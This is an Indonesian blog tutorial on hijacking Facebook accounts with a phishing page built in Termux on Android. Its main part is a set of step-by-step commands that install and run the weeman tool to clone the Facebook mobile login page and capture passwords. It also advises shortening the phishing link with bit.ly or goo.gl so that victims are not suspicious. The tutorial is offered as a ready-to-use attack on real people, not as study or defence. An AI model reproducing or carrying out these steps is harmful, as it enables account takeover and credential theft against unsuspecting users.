Cara Hack akun Facebook dengan Termux android no root

Cara Hack akun Facebook dengan Termux android no root
Hallo sahabat Blogger di manapun berada, Pada Kesempatan ini Saya akan Bagikan Cara Hack akun Facebook menggunakan Termux android no root yang di mana tutorial / Informasi kali insyaAllah Berbeda dari Website Lainnya. Nah Pada Cara Hack akun Facebook dengan Termux android no root kali ini saya Jelaskan dengan Se jelas jelasnya , Agar agan Bisa mempelajarinya dengan baik dan benar.  Sedikit Informasi tentang Facebook:
 
Cara Hack akun Facebook dengan Termux android no root

Facebook merupakan layanan social media yg masuk kategori 3 besar layanan social media dengan pengguna aktif terbanyak di dunia, Karna di sini yg akan di bahas tentang cara hack akun facebook jadi sangat tidak akan menjelaskan lebih jauh tentang facebook itu sendiri.

Account/akun facebook dapat di hack dengan 2 metode/cara:


  1. dengan metode brute force (menebak sebuah user/password secara berulang ulang) di mana cara ini membutuh kumpulan kata yg sudah di susun (wordlist) dalam melakukanya. 
  2. dengan metode pishing yang mana cara kerjanya ialah meniru sebuah halaman (kloning) login lalu memberikanya pada korban yg di tuju sehingga korban memasukan username dan password dan program dari pishing akan menginput password korban.

Disini saya akan memberikan tutorial cara hack akun facebook menggunakan android tanpa root dengan aplikasi termux

Dan metode yg akan kita gunakan ialah pishing dengan bantuan tools dari weeman.

Apa itu weeman


Weeman adalah tools untuk pembuatan web pishing yg di bangun dengan bahasa pemerograman python, Cara kerjanya ialah tools ini akan mendownload sebuah halaman terlebih dahulu lalu halaman tersebut di jadikan tiruan pada localhost kita

Cara Install Weeman Web Pishing Menggunakan Termux:

Pertama kita harus menginstall aplikasi termux dulu kalian bisa menginstall termux melalui playstore
Setelah termux terinstall selanjutnya menginstall package berikut:

  • apt install git python2
  • Kemudian melakukan kloning script weeman dari github dengan perintah berikut
    git clone https://github.com/evait-security/weeman.git
  • Cara melakukan pishing facebook dengan caranya sebagai berikut
    cd weeman
  • python2 weeman.py
    Lalu masukkan:
    • set url https://m.facebook.com
    • set action_url https://m.facebook.com/login
  • run
  • ketik 127.0.0.1:8080 pada browser maka web pishing yg di buat tadi sudah jadi
  • Dan url tersebutlah yang akan kita berikan pada korban agar korban tidak terlalu curiga ada baiknya url tersebut di short terlebih dahulu dengan layanan shortlink seperti bit.ly atau goo.gl agar korban tidak terlalu curiga dengan web pishing yg kita buat

Oke sekian Tutorial Cara Hack akun Facebook menggunakan Termux semoga apa yang saya sampaikan bisa membantu anda, dan apabila ada masalah yang belum di mengerti silahkan tinggalkan pertanyaan anda di komentar terimakasih.